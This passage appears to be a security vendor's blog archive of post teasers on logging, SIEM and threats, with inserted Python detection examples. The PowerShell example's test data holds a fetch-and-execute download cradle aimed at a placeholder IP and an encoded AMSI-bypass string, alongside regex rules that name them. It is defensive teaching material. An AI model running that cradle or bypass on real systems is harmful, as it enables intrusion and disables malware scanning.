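     "User": "svc_backup", "Computer": "WS-BOB", "Ip": "10.1.7.9"},
    {"ts": "2024-03-04T22:31:00", "EventID": 4624, "LogonType": 2, "LogonId": "0x7b001",
     "User": "bob", "Computer": "WS-BOB", "Ip": "-"},
]

# Assumed allow-list: the computers each account is expected to log on to.
ALLOWED = {"alice": {"WS-ALICE"}, "svc_backup": {"BACKUP01"}}


def _ts(e):
    return datetime.fromisoformat(e["ts"])


def who_logged_on_where(events):
    """Q1: which accounts had an interactive session on which computers."""
    seen = defaultdict(set)
    for e in events:
        if e["EventID"] == 4624 and e["LogonType"] in INTERACTIVE:
            seen[e["User"]].add(e["Computer"])
    return {user: sorted(computers) for user, computers in seen.items()}


def session_durations(events):
    """Q2: how long each interactive session lasted.

    4624 is paired with the matching 4634/4647 on (Computer, LogonId).
    Returns (closed sessions, sessions still open at the end of the data)."""
    open_sessions, closed = {}, {}
    for e in sorted(events, key=_ts):
        key = (e["Computer"], e["LogonId"])
        if e["EventID"] == 4624 and e["LogonType"] in INTERACTIVE:
            open_sessions[key] = e
        elif e["EventID"] in (4634, 4647) and key in open_sessions:
            start = open_sessions.pop(key)
            closed[(e["User"], e["Computer"])] = _ts(e) - _ts(start)
    return closed, open_sessions


def unauthorized_logons(events, allowed=ALLOWED):
    """Q3: logons (any type) to a computer the account is not expected on."""
    return [e for e in events
            if e["EventID"] == 4624
            and e["User"] in allowed
            and e["Computer"] not in allowed[e["User"]]]


def after_hours_logons(events, start_hour=7, end_hour=19):
    """Q4: interactive logons outside business hours (UTC in this sample)."""
    return [e for e in events
            if e["EventID"] == 4624 and e["LogonType"] in INTERACTIVE
            and not (start_hour <= _ts(e).hour < end_hour)]


if __name__ == "__main__":
    print(who_logged_on_where(EVENTS))
    closed, still_open = session_durations(EVENTS)
    print(closed, [e["User"] for e in still_open.values()])
    print([(e["User"], e["Computer"]) for e in unauthorized_logons(EVENTS)])
    print([(e["User"], e["ts"]) for e in after_hours_logons(EVENTS)])
```

None of these four answers is available from domain controller logs alone: the 4624 for a console logon, its logon type, and the matching 4634/4647 are written on the workstation, which is the point the post makes.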


Venom Vulnerability exposes most Data Centers to Cyber Attacks

Just after a new security vulnerability surfaced Wednesday, many tech outlets started comparing it with Heartbleed, the serious vulnerability uncovered last year that rendered communications with many well-known web services insecure, potentially exposing millions of plain-text passwords. But don’t panic. Though the recent vulnerability has a more terrifying name than Heartbleed, it is not going to cause as much damage as Heartbleed did.

Cyberattacks on Banks: 5 Growing Threats in 2023

Cyberattacks against banks and financial institutions continue to rise as cybercriminals develop new tactics.  The global financial sector is one of the biggest cybercrime targets in the world. The volume and sophistication of cyberattacks on banks surged in 2022, spiking considerably at the very end of the year. 

The Difference Between a SIEM Solution and SIEM Tool: Features vs. Outcomes

Can you simply buy a “SIEM solution”? Turns out you really cannot, no matter how hard you try nor how passionately the vendor promises. What you can buy at the store is a SIEM tool, which is a completely different thing. SIEM tools are products, while implementing a security or compliance solution involves people, process, and technology. SIEM tools are a critical part of SIEM, but they’re not the whole solution.

How to analyze login and pre-authentication failures for Windows Server 2003 R2 and below

Analyzing all the login and pre-authentication failures within your organization can be tedious. There are thousands of login failures generated for several reasons. Here we will discuss the different event IDs and error codes and how you can simplify the login failure review process.
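As an added example (not the post's own code), here is the kind of triage script that review leads to. It maps the legacy per-reason failure event IDs (529 to 537, 539) and the Kerberos pre-authentication failure event 675 with its KDC failure code to readable reasons, then separates one-source/many-account password spraying from a run of bad passwords ending in a lockout. The "key=value" export format and its field names are this script's assumptions, and the log lines are constructed.

```python
"""Triage of legacy Windows logon failures (Server 2003 R2 and earlier).

Added example, not code from the original post.  Pre-Vista Windows logs a
separate failure event ID per reason (529-537, 539) and a Kerberos
pre-authentication failure as event 675 with a KDC failure code.  The log
lines below are constructed in a simplified "key=value" export format, not a
real Security log dump; the field names are this script's assumptions.
"""
import re
from collections import Counter, defaultdict

# Legacy logon-failure event IDs (2000/XP/2003) and what each one means.
LOGON_FAILURE = {
    529: "unknown user name or bad password",
    530: "logon outside permitted hours",
    531: "account disabled",
    532: "account expired",
    533: "workstation restriction",
    534: "logon type not granted",
    535: "password expired",
    536: "NetLogon component not active",
    537: "other error",
    539: "account locked out",
}

# Kerberos pre-authentication failure codes seen in event 675 (RFC 4120 KDC errors).
KERBEROS_FAILURE = {
    "0x6":  "client principal unknown (bad user name)",
    "0x12": "credentials revoked (disabled, expired or locked-out account)",
    "0x17": "password expired",
    "0x18": "pre-authentication failed (bad password)",
    "0x25": "clock skew too great",
}

LOGIN_LINE = re.compile(r"^(?P<ts>\S+ \S+) EventID=(?P<id>\d+) User=(?P<user>\S+) "
                        r"Source=(?P<src>\S+)(?: Code=(?P<code>0x[0-9a-f]+))?$")

# Constructed sample export; not real log data.
SAMPLE = """\
2007-05-21 09:12:01 EventID=675 User=jsmith Source=10.0.0.15 Code=0x18
2007-05-21 09:12:02 EventID=675 User=mlopez Source=10.0.0.15 Code=0x18
2007-05-21 09:12:02 EventID=675 User=akhan Source=10.0.0.15 Code=0x18
2007-05-21 09:12:03 EventID=675 User=bwong Source=10.0.0.15 Code=0x6
2007-05-21 09:12:03 EventID=675 User=cdiaz Source=10.0.0.15 Code=0x18
2007-05-21 10:40:11 EventID=529 User=jsmith Source=WS-15
2007-05-21 10:40:19 EventID=529 User=jsmith Source=WS-15
2007-05-21 10:40:25 EventID=529 User=jsmith Source=WS-15
2007-05-21 10:40:31 EventID=539 User=jsmith Source=WS-15
2007-05-21 11:02:44 EventID=531 User=oldcontractor Source=VPN-GW
2007-05-21 11:15:09 EventID=675 User=printsvc Source=10.0.3.8 Code=0x25
"""


def parse(text):
    """Turn the export into records with a human-readable failure reason."""
    records = []
    for line in text.splitlines():
        m = LOGIN_LINE.match(line)
        if not m:
            continue                      # skip anything that is not a failure line
        event_id = int(m["id"])
        if event_id == 675:
            reason = KERBEROS_FAILURE.get(m["code"], "unknown KDC code %s" % m["code"])
        else:
            reason = LOGON_FAILURE.get(event_id, "unmapped event %d" % event_id)
        records.append({"ts": m["ts"], "id": event_id, "user": m["user"],
                        "source": m["src"], "reason": reason})
    return records


def reason_summary(records):
    """Count failures per reason: the first cut that separates noise from attacks."""
    return Counter(r["reason"] for r in records)


def spray_sources(records, min_users=4):
    """Sources hitting many *different* accounts with bad passwords: password spraying."""
    users_by_source = defaultdict(set)
    for r in records:
        if r["id"] == 529 or (r["id"] == 675 and "bad password" in r["reason"]):
            users_by_source[r["source"]].add(r["user"])
    return sorted(s for s, users in users_by_source.items() if len(users) >= min_users)


def locked_out_after_failures(records, min_failures=3):
    """Accounts that hit a lockout (539) right after a run of bad-password failures."""
    streak = Counter()
    locked = set()
    for r in records:
        if r["id"] == 529:
            streak[r["user"]] += 1
        elif r["id"] == 539 and streak[r["user"]] >= min_failures:
            locked.add(r["user"])
    return sorted(locked)


if __name__ == "__main__":
    recs = parse(SAMPLE)
    for reason, n in reason_summary(recs).most_common():
        print(f"{n:3d}  {reason}")
    print("spraying from:", spray_sources(recs))
    print("locked out after brute force:", locked_out_after_failures(recs))
```

The clock-skew (0x25) and disabled-account (531) entries are the ordinary noise the post mentions; grouping by reason first keeps them from burying the two patterns that actually matter.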

Five quick wins to reduce exposure to insider threats

A data breach has serious consequences both directly and indirectly. Lost revenue and a tarnished brand reputation both inflict harm long after incident resolution and post breach clean-up. Still, many organizations don’t take necessary steps to protect themselves from a potentially detrimental breach.


Essential soft skills for cybersecurity success

IT workers in general, but IT security professionals even more so, pride themselves on their technical skills, keeping abreast of the latest threats and the newest tactics to demonstrate to management and peers that they are “worthy.”

Protecting Against Ransomware Attacks: What Every Business Needs to Know

Ransomware attack frequency is at its height as there have been more than 4,000 ransomware attacks happening each day for over a year now. Follow these tips to help avoid a ransomware breach at your business.

The Art of Detecting Malicious Activity with Logs

Randy Franklin Smith compares methods for detecting malicious activity from logs including monitoring for high impact changes, setting up tripwires and anomalous changes in activity levels. Security standards and auditors make much of reviewing logs for malicious activity.

Four Ways MSSPs can Boost Security Speed and Readiness

As more service providers explore offering a Managed Detection and Response (MDR) solution, they may face indecision or inertia during startup and optimization. Managed Security Service Providers (MSSPs) know that speed matters in cybersecurity, as it improves attack surface coverage and team productivity.

Logs for Insider Abuse Investigations

In most previous newsletters, we have discussed the use of logging for various regulatory mandates (such as PCI DSS, HIPAA and FISMA) as well as the use of logs for incident response and malicious software tracking. This log data can also be incredibly useful for detecting and investigating insider abuse and internal attacks.

Using Dynamic Audit Policy to Detect Unauthorized File Access

One thing I always wished you could do in Windows auditing was mandate that access to an object be audited if the user was NOT a member of a specified group. Why? Well sometimes you have data that you know a given group of people will be accessing and for that activity you have no need of an audit trail. Let’s just say you know that members of the Engineering group will be accessing your Transmogrifier project folder and you do NOT need an audit trail for when they do. But this is very sensitive data and you DO need to know if anyone else looks at Transmogrifier.

Detect Persistent Threats on a Budget

There’s a wealth of intelligence available in your DNS logs that can help you detect persistent threats. So how can you use them to see if your network has been hacked, or check for unauthorized access to sensitive intellectual property after business hours?
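An added example, not code from the original post, of three of the signals that question points at: after-hours lookups of hosts that hold sensitive intellectual property, fixed-interval queries to one domain (the check-in rhythm of an implant), and long high-entropy labels typical of DGA or DNS-tunnelling names. The query-log format is a simplified "<timestamp> client <ip> query: <name>" line (not a real capture), and the sensitive-host list is this script's assumption.

```python
"""Three persistent-threat signals pulled from DNS query logs.

Added example, not code from the original post.  The log excerpt is
constructed in a simplified "<timestamp> client <ip> query: <name>" format,
not a real capture, and the sensitive-host list is this script's assumption.
"""
import math
import re
import statistics
from collections import Counter, defaultdict
from datetime import datetime

LINE = re.compile(r"^(?P<ts>\S+T\S+) client (?P<client>\S+) query: (?P<name>\S+)$")

# Constructed sample; not real traffic.
LOG = """\
2024-03-04T09:00:12 client 10.0.9.3 query: www.example.com
2024-03-04T10:12:40 client 10.0.9.3 query: mail.corp.example
2024-03-04T14:30:05 client 10.0.9.3 query: ip-vault.corp.example
2024-03-05T01:00:00 client 10.0.5.12 query: cdn-update.example-telemetry.net
2024-03-05T01:05:00 client 10.0.5.12 query: cdn-update.example-telemetry.net
2024-03-05T01:10:00 client 10.0.5.12 query: cdn-update.example-telemetry.net
2024-03-05T01:15:00 client 10.0.5.12 query: cdn-update.example-telemetry.net
2024-03-05T01:20:00 client 10.0.5.12 query: cdn-update.example-telemetry.net
2024-03-05T02:14:33 client 10.0.5.12 query: ip-vault.corp.example
2024-03-05T02:15:01 client 10.0.5.12 query: x7k2p9qzv4m1r8t3w6y0abcd.badexample.org
"""

# Assumed list of hosts holding intellectual property worth watching after hours.
SENSITIVE = {"ip-vault.corp.example", "svn.corp.example"}


def parse(text):
    out = []
    for line in text.splitlines():
        m = LINE.match(line)
        if m:
            out.append((datetime.fromisoformat(m["ts"]), m["client"], m["name"].lower()))
    return out


def registrable(name):
    """Crude 'registrable domain': last two labels (no public-suffix list here)."""
    return ".".join(name.rstrip(".").split(".")[-2:])


def shannon_entropy(s):
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def after_hours_sensitive(records, sensitive=SENSITIVE, start_hour=7, end_hour=19):
    """Who resolved a sensitive host outside business hours (UTC in the sample)."""
    return [(client, name, ts.isoformat()) for ts, client, name in records
            if name in sensitive and not (start_hour <= ts.hour < end_hour)]


def beacons(records, min_queries=4, max_jitter=0.1):
    """(client, domain, interval_s) triples queried at near-constant intervals."""
    times = defaultdict(list)
    for ts, client, name in records:
        times[(client, registrable(name))].append(ts)
    found = []
    for key, stamps in times.items():
        if len(stamps) < min_queries:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        mean = statistics.mean(gaps)
        # Low spread relative to the mean gap means a timer, not a human.
        if mean > 0 and statistics.pstdev(gaps) / mean <= max_jitter:
            found.append(key + (round(mean),))
    return found


def suspicious_labels(records, min_len=20, min_entropy=3.5):
    """Names whose leftmost label is long and high-entropy (DGA / tunnelling)."""
    hits = set()
    for _, _, name in records:
        label = name.split(".")[0]
        if len(label) >= min_len and shannon_entropy(label) >= min_entropy:
            hits.add(name)
    return sorted(hits)


if __name__ == "__main__":
    recs = parse(LOG)
    print(after_hours_sensitive(recs))
    print(beacons(recs))
    print(suspicious_labels(recs))
```

Real implants add jitter to the check-in interval, so `max_jitter` is a tuning knob rather than a constant; the two-label `registrable()` shortcut is enough for a demonstration but a production rule would use a public-suffix list.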

Remote Work: Hidden Evils Revealed

Remote work is seemingly here to stay, with many workers forgoing their commute to work for a nice stroll to their in-home office. The WFH movement provides great flexibility but comes with even greater challenges for cybersecurity.   A 200% increase in cyberattacks has been witnessed following the remote working surge, leading to a greater […]

Phishing: The World's Top Cyber Threat

What is Phishing? Phishing is a type of online fraud which aims to steal personal and financial information by impersonating reputable companies. Phishing can be done through email, websites, and social media. One of the most common ways phishers try to get your information is by sending you an email from a company you do […]

OpenSSL 3.0.7 Released: Everything You Need to Know About the High-Severity Vulnerability

OpenSSL originally warned this patch would fix a critical vulnerability impacting all OpenSSL 3.0 installations. OpenSSL has released a patch fixing the headline-making vulnerability it first announced on October 27th, 2022.  

OpenSSL Critical Vulnerability: Everyone Must Update to Version 3.0.7

The open-source cryptographic library is an industry-standard found in an enormous range of applications. In late October, the OpenSSL Project announced it would release a patch for a critical security vulnerability on November 1st, 2022. The organization did not share any details about the vulnerability itself, other than the fact that it impacts all OpenSSL […]

Ransomware Attacks and How to Protect Yourself

What is Ransomware? Ransomware is malware that restricts an organization's or user's access to the data on their computer. Cybercriminals put businesses in a situation where paying the ransom looks like the quickest and least expensive way to recover access to their data: they encrypt these files and demand a ransom for the decryption […]

How NDR Is Revolutionizing Cybersecurity

Network Detection and Response (NDR) is a fast-growing field of cybersecurity, providing network-wide monitoring and advanced detection of potentially malicious threat actors and suspicious activity that other tools may miss. An NDR solution continuously inspects network traffic while building a baseline of normal network activity, creating an incredibly difficult environment for attackers […]

How Do Biometrics Affect Cybersecurity? 

Biometrics 101  Biometrics use physical characteristics such as fingerprints, facial features, and retina patterns to establish identity, and form a more advanced sector of security. A biometric is simply a biological measurement or unique physical characteristic that not even your twin would share. Think of it as you, yourself, being the […]

Cybersecurity Awareness Month | October 2022

Starting 18 years ago, Cybersecurity Awareness Month has grown into a global effort to educate, inform, and empower everyone to protect themselves online as cyberthreats have increased dramatically over the past decade. As our livelihoods shift predominantly online, we become more vulnerable to prying eyes and malicious threat actors. This collaboration between […]

Machine Learning and AI in Cybersecurity

Artificial intelligence (AI) and machine learning are positioned to assist today's enterprises as they fight to defend themselves against the rising number of cyber attacks.    Real-time learning and analysis of potential cyber risks is made feasible by AI and machine learning. Additionally, they use computers to create behavioral models, employing these models to forecast […]

Incident Response in Exabeam: How to Create Playbooks and Automate Security Incident Resolution

Learn how to use the platform's security orchestration, automation, and response (SOAR) solution to quickly investigate and resolve security incidents.  Exabeam enables security teams to automate their response to security incidents, dramatically reducing the time and resources required to mitigate active attacks. The platform's Incident Responder lets analysts automate time-consuming tasks when investigating incidents and […]

Cloud Attacks: Are You Still Safe?

95% of respondents are using the cloud, according to the 2016 State of the Cloud Survey. Despite its fast expansion, the nature of cloud-based computing opens the door to severe security breaches that can significantly harm an enterprise. One of the top worries is data security.   How […]

Cyber Corruption: LAPSUS$

What do Microsoft, Okta, T-Mobile, Nvidia, and LG all have in common? Well, for starters, they have all been extorted by one of the most prolific and unpredictable hacking groups of 2022.   The group, known as LAPSUS$, remarkably infiltrated and extorted a handful of the largest, preeminent tech giants in the world through a unique […]

Public WiFi: Top Dangers for Remote Work

Public Wifi & Working From Home  By 2025, upwards of 36 million Americans will have entirely remote or flexible occupations, an 87 percent post-pandemic rise, according to some analysts. One might infer that the opportunity to work outside of the office has led many employees to select open areas like cafés, diners, railway stations, […]

Keep Your Digital Footprint in Step with Your Information Security Needs

Every online action you perform involves sharing a bit of data – over time, that data can add up.  Successful organizations and influential people rely on the public Internet to promote their brands, ideas, and products. A significant amount of time and energy goes into building a brand, and most of it is spent online. 

A Guide to Cybercrimes and How They are Disrupting Our Lives 

What is Cybercrime?  Cybercrime is a term that refers to all criminal activity perpetrated using computers and the internet. It includes crimes like hacking, phishing, identity theft, and more.      The term is usually traced back to the 1980s, when William Gibson’s 1984 novel “Neuromancer” popularized the related word “cyberspace”; “cybercrime” came to refer to crimes […]

Palo Alto Networks PAN-OS Vulnerability: What Users Need to Know

The flaw has been exploited in real-world attacks, but most Palo Alto customers will remain unaffected.  In the second week of August, Palo Alto Networks issued a security warning for a high-severity vulnerability in its PAN-OS operating system. Many of the company's networking hardware products use this operating system, but not all of them are […]

How to Create a Ransomware-Ready Disaster Recovery Plan

Data disasters come in all shapes and forms, and enterprises need to have multi-layered contingencies in place. A good enterprise disaster recovery plan protects against a wide variety of scenarios. It must ensure business continuity – or provide a plausible roadmap for it – in case of natural disasters, human errors, and malicious cyberattacks. 

How to Access and View Event Logs Using Exabeam in Linux

Examining event and endpoint logs is the first step towards building comprehensive customized rulesets.  Many information security leaders have significant deployments on open-source operating systems based on the Linux kernel, and for good reason. Linux distributions like Debian and Ubuntu have a reputation for visibility and security at a price that's impossible to beat – […]

How to Set Up Robust Log Management in Linux with AuditD

Find out how to configure Linux to generate comprehensive log feeds for SIEM, UEBA, and SOAR technologies.  Linux is an attractive solution for enterprises in search of a flexible, powerful operating system. Many different operating systems use the Linux kernel, such as Ubuntu, Debian, and Red Hat Enterprise Linux (RHEL), which itself is an enterprise-ready […]

Craft Custom Rules to Improve Exabeam Performance: Part 2

Enriched data enables analysts to conduct faster, more accurate investigations in Exabeam.  The first part of this series covered some of the ways analysts can use context to build custom rules in Exabeam. Teaching Exabeam to recognize network zones and asset groups enables security professionals to cluster similar behaviors together, making it easier to investigate […]

Security Posture Priorities

Solution Evaluation  An integral step in creating a resilient cybersecurity platform is to perform an audit of your organization's existing policies and procedures. Lumifi can help with this endeavor during our Asset Criticality Assessment, during the client onboarding process, and periodically on a structured timeline. Here are the components we consider when looking at the entire security […]

Breaking-Down Managed Detection and Response

Cybersecurity is a very important issue for any organization, and events can lead to a variety of negative outcomes; incidents often result in data theft, financial loss, and even damaged reputation. The cost of an attack is very high, which is why it's important to be prepared for the worst-case scenario. Managed Detection and Response […]

Simplifying SOAR

Security Orchestration, Automation and Response (SOAR) is an integrated, automated, and orchestrated set of services that provide a response to cyber incidents. It enables the rapid identification of cyber incidents and prevents them from escalating into major disasters.   SOAR was developed as a response to the need for automating incident responses and remediating security incidents. SOAR utilizes a framework that can […]

The 3 Types of Firewalls: What Is the Most Secure Type of Firewall?

We'll chat more in detail further along here, but right away, we want to tell you what the three types of firewalls are:

What Is SOAR Security?

The SOAR in SOAR security stands for:

How to Configure Your Windows Audit Policy to Optimize SIEM Performance

You can significantly improve Windows' log reporting capabilities with a few key changes. Your SIEM works by collecting log data from across the enterprise IT environment. The more detailed and comprehensive these logs are, the more accurate its insights will be. Although Windows has a basic set of log reporting capabilities built in, the operating […]

Everything You Need to Know About the Spring4shell Vulnerability

A newly discovered Spring vulnerability enables remote code execution on enterprise Java applications. In late March, a developer publicly posted exploit code for a zero-day vulnerability in the Spring Framework, a popular solution for building enterprise applications in Java. Spring is part of VMware's suite of enterprise products, designed to let developers quickly and […]

How to Alleviate Alert Fatigue When Enterprise Security Needs Keep Growing

Cybersecurity leaders prioritize security event management efficiency now more than ever. Security analysts receive messages and alerts all day long. It's a core part of the job.

Virtualization Security: What Are the Real-World Risks?

There’s been a lot of recent hype about security risks with the rise of virtualization, but much of it is vague and short on specifics.  There is also an assumption that all the security available on a physical server simply disappears when it migrates to being a virtual machine.  This is not true.

How Advanced MDR Helps with Security Detection and Response of 7 Common Threats

677.66 million. That's the number of cumulative detections of newly-developed malware applications worldwide in 2020. If you think your organization's basic antivirus software can keep up with this constant barrage of attacks, well, it's simply not possible.

EDR Endpoint Protection: What It Is, How It Works, and Its 5 Benefits to Businesses

The average IT department manages thousands of endpoints, each coming with a very real risk of cyberattack. From laptops and servers to IoT devices and digital assistants, hackers are constantly on the lookout for an open door to infiltrate.

Upgrade Your Audit Policies: What Should You Be Logging?

Your security response depends heavily on what data you log, and how you log it. Your security information and event management (SIEM) solution uses logs to build an accurate picture of your organization's security profile.  

What Is Managed Detection and Response and Why Do You Need It?

The security of data and systems is one of the most important concerns in today's business world. If your data is at risk or compromised, it can cripple your operations along with the trust others have in your business.

Lumifi's Complete Guide to Information Security Managed Services

Companies must protect important and sensitive data no matter its form. So, what is information security? It includes everything from making sure digital information is protected against hackers to assuring a physical filing cabinet full of billing information is defended against thieves.

Is SOAR A Must For Your Tech Stack?

Security Orchestration, Automation, and Response (SOAR) tools enable analysts to establish efficient workflows for handling both common and highly sophisticated threats.  Even the best enterprise cybersecurity workflows suffer from scalability issues. 

The Necessity of Threat Hunting

Press play to get an inside look at how Lumifi works with Anomali ThreatStream.

How Fortune 200 Enterprises Select MDR Vendors

For large organizations, managed detection and response is just one of many cybersecurity solutions that must work together seamlessly. Enterprise cybersecurity professionals have to choose their tech stack wisely.  

New Federal Standards Prioritize Logging to Detect, Prevent, and Remediate Cybersecurity Incidents

The Federal government has defined new standards for cybersecurity event logging systems. On May 12th, 2021, just days after the headline-making Colonial Pipeline ransomware attack, the White House issued an executive order on improving the nation's cybersecurity.

Tony Simone Named Exabeam's "Technical Person of the Year" for 2021

Castra Managed Services is excited to announce that its company co-founder, Tony Simone, has been named Exabeam's "Technical Person of the Year" for 2021. Exabeam, the Gartner Magic Quadrant leader in security information and event management (SIEM), held its annual Spotlight Partner Summit early last week, where various partners met to discuss industry trends and new developments in SIEM technology.

How Data Lake and Cloud Archive Can Improve Your Security Posture

Is your business weighing the pros and cons of data lake and cloud archive? We can help with that. What we need to establish first is how your organization handles compliance regarding your company's and customers' data. Where does that data reside? Is it secure, and if you needed to recall aging data […]

Improving Visibility and Preventing a Miss - Part 3: Custom PowerShell Rules

A major risk for a SIEM or SOAR is not effectively using the key PowerShell logs it collects. We have talked about the risk of incorrect and empty logs, or of missing the logging required for advanced detection; once you have the logs, we cannot assume that machine learning and behavior modeling will detect everything.
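An added example, not code from the original post, of the custom rules this part is about, written over PowerShell Script Block Logging (event 4104). Two things a naive per-event pattern match misses are handled: long script blocks are logged as several 4104 fragments and are reassembled before matching, and `-EncodedCommand` payloads (base64 of UTF-16LE text) are decoded and scanned as well. The event records, the rule names and the sample URL are constructed for this script.

```python
"""Custom detection rules over PowerShell Script Block Logging (event 4104).

Added example, not code from the original post.  The events below are
constructed records with the fields a 4104 event carries (ScriptBlockId,
MessageNumber, MessageTotal, ScriptBlockText); they are not real logs, and
the rule names and the sample URL are this script's assumptions.
"""
import base64
import re
from collections import defaultdict

RULES = {
    "download_cradle":   re.compile(r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest", re.I),
    "invoke_expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "encoded_command":   re.compile(r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "hidden_window":     re.compile(r"-W(?:indowStyle)?\s+Hidden", re.I),
    "amsi_tamper":       re.compile(r"AmsiUtils|amsiInitFailed|AmsiScanBuffer", re.I),
}
ENCODED = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{20,})", re.I)

# Constructed: -EncodedCommand takes base64 of UTF-16LE text, so build it that way.
_AMSI_BYPASS = ("[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')"
                ".GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)")
_ENC = base64.b64encode(_AMSI_BYPASS.encode("utf-16-le")).decode()

EVENTS = [
    # Script block A was logged in three fragments; note the patterns split across them.
    {"ScriptBlockId": "A", "MessageNumber": 1, "MessageTotal": 3,
     "ScriptBlockText": "$c = New-Object Net.WebClient; $u = 'http://198.51.100.7/p.ps1'; $s = $c.Download"},
    {"ScriptBlockId": "A", "MessageNumber": 2, "MessageTotal": 3,
     "ScriptBlockText": "String($u); Invoke-Expre"},
    {"ScriptBlockId": "A", "MessageNumber": 3, "MessageTotal": 3,
     "ScriptBlockText": "ssion $s"},
    {"ScriptBlockId": "B", "MessageNumber": 1, "MessageTotal": 1,
     "ScriptBlockText": "powershell -NoP -W Hidden -enc " + _ENC},
    {"ScriptBlockId": "C", "MessageNumber": 1, "MessageTotal": 1,
     "ScriptBlockText": "Get-ChildItem C:\\Logs | Where-Object Length -gt 1MB"},
]


def scan(text):
    """Rule names that fire on a piece of script text."""
    return sorted(name for name, rx in RULES.items() if rx.search(text))


def decode_encoded_commands(text):
    """Decode every -EncodedCommand payload found in the text (UTF-16LE base64)."""
    decoded = []
    for b64 in ENCODED.findall(text):
        try:
            decoded.append(base64.b64decode(b64).decode("utf-16-le"))
        except (ValueError, UnicodeDecodeError):
            continue                      # not a valid payload; leave it to the raw-text rules
    return decoded


def reassemble(events):
    """Join 4104 fragments per ScriptBlockId, in MessageNumber order."""
    parts = defaultdict(dict)
    for e in events:
        parts[e["ScriptBlockId"]][e["MessageNumber"]] = e["ScriptBlockText"]
    return {sid: "".join(frag[n] for n in sorted(frag)) for sid, frag in parts.items()}


def analyze(events):
    """Rules per script block, scanning reassembled text plus any decoded payloads."""
    verdicts = {}
    for sid, text in reassemble(events).items():
        hits = set(scan(text))
        for payload in decode_encoded_commands(text):
            hits.update(scan(payload))
        verdicts[sid] = sorted(hits)
    return verdicts


if __name__ == "__main__":
    for sid, hits in analyze(EVENTS).items():
        print(sid, hits or "clean")
    # Per-fragment matching would have seen nothing in block A's middle fragment:
    print("fragment 2 alone:", scan(EVENTS[1]["ScriptBlockText"]))
```

Block A's middle fragment matches no rule on its own; only the reassembled text exposes the download cradle feeding `Invoke-Expression`. Block B's raw text shows only a hidden window and an encoded command; the AMSI tampering is visible only after decoding.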

The Difference Between Cybersecurity & Network Security

Today’s threat landscape is more diverse and expansive than at any period since the beginning of the information age. Recent trends, such as a 358% rise in malicious activity from July 2019 to July 2020 and 90% of healthcare organizations reporting security breaches, highlight the increased dangers enterprises face. To effectively detect and […]

Update on PrintNightmare & Kaseya Ransomware

Over the 4th of July weekend, two breaches were brought to Lumifi's attention pertaining to PrintNightmare and Kaseya. Details on PrintNightmare While you likely do not have Print Servers exposed to the world (we hope not), we also wanted to note that we are aware of this and have diligently reviewed detection methodology. POC code […]

Improving Visibility and Preventing a Miss - Part 2: Custom PowerShell Collection

A worrisome risk for a SIEM or SOAR is not collecting key logs used or required for the advanced modeling in today's platforms. In our experience, incorrect/empty logs or lack of logging required for advanced detection (as we discussed in the first post on this topic), is obviously bad, yet failing to pick them up […]

Strong Showing For Lumifi Partners In 2021 Gartner Magic Quadrant

The newest Gartner Magic Quadrant for EPP showcases 4 Lumifi partners who are leading in this space. When Gartner released its Magic Quadrant for EPP, we saw a clear separation in the market among the considered vendors. As an industry we have witnessed […]

What is Cyber Insurance?

Statistics show that the fallout from successful cybersecurity incidents has both financial and business-related consequences. A data breach costs the average enterprise approximately $60,000, and in extreme situations small and medium-sized businesses may go out of business within 6 months of the incident. Thus, to determine whether the financial cost of successful […]

Top 5 Most Popular Cybersecurity Certifications

The cybersecurity analyst has become the third most valuable job description in the technology industry. The increasing security incidents to IT infrastructure, the demand for accountability from end-users, and the financial cost of successful breaches are significant reasons enterprises and startups are taking cybersecurity seriously. Ambitious professionals who choose a career in IT security are […]

What is Ransomware?

Ransomware is a form of malware cybercriminals use to encrypt data stored in computers or online servers. Cybercriminals demand payment to release the encryption key blocking the user from accessing the encrypted data. Payment is typically made through diverse mediums, including digital currency like Bitcoin. Once payment has been made, the victim is generally provided with […]

F5 BIG-IP Vulnerabilities

Twelve days ago, F5 announced several security vulnerabilities that were largely overshadowed by the Exchange/Hafnium situation. It's important to understand that some of these are critical, remote command execution-level vulnerabilities that require nothing more than an attacker being able to connect to an F5 BIG-IP device. For those devices, being positioned "in front of" web server clusters […]

Microsoft Exchange Vulnerability

As you may know, a zero-day vulnerability in Microsoft Exchange Server was published last week that is garnering a lot of attention. Microsoft has attributed this to a known threat actor that has now compromised thousands or even tens of thousands of systems with these attacks, though it's important to understand that other attackers are […]

5 Do's and Don'ts to Qualify Your Next MDR

(Updated April 2022) The success of your managed detection and response deployment hinges on asking the right questions. Managed detection and response is a valuable element of your enterprise's security posture. With the right technologies in the hands of competent, highly trained analysts, you can significantly reduce security risks while paying a fraction of what […]

What is Penetration Testing?

A penetration test or pen test is a simulated cyber-attack against computer systems, application systems, and IT infrastructure to discover loopholes. These simulated cyber-attacks come in diverse forms with the intent of breaching a system through its servers, web or mobile applications, and other endpoints. The purpose of pen testing is to discover exploitable vulnerabilities in […]

What is the MITRE ATT&CK Framework?

Learn about the MITRE ATT&CK® Framework and how cybersecurity teams leverage its matrix of tactics and techniques to assess risk and vulnerabilities within an organization. Definition  The MITRE ATT&CK Framework is a knowledge base of tactics and techniques that can be used as a foundation for classifying adversary behaviors and assessing an organization’s vulnerabilities.  Created in 2013 by the […]

SolarWinds vs. Splunk: Comparing Two Leading SIEM Solutions

SolarWinds Log Event Manager and Splunk Enterprise Security are two of the top security information and event management tools. Both SIEM solutions differ but offer high-performing features that simplify threat detection and response within expansive networks. Here, we look at key differentiators between both options. To effectively compare both options, the following criteria were chosen […]

What is SOAR?

SOAR is an acronym thrown around a lot within the cybersecurity industry, but what does it really mean? SOAR stands for Security Orchestration, Automation and Response. SOAR tools are the technologies used to orchestrate responses to security incidents and assign responsibilities between various tools and individuals within a security team or enterprise. The working principles of […]

5 Questions to Ask an MSSP

An organization’s choice to seek a managed security services provider (MSSP) to guard over its IT infrastructure is usually based on three major reasons. According to Gartner’s 2020 Market Guide for Managed Detection and Response Services, they are: To simplify the decision-making process while ensuring the final choice leads to a long-lasting business relationship, here […]

MDR Service Delivery Options

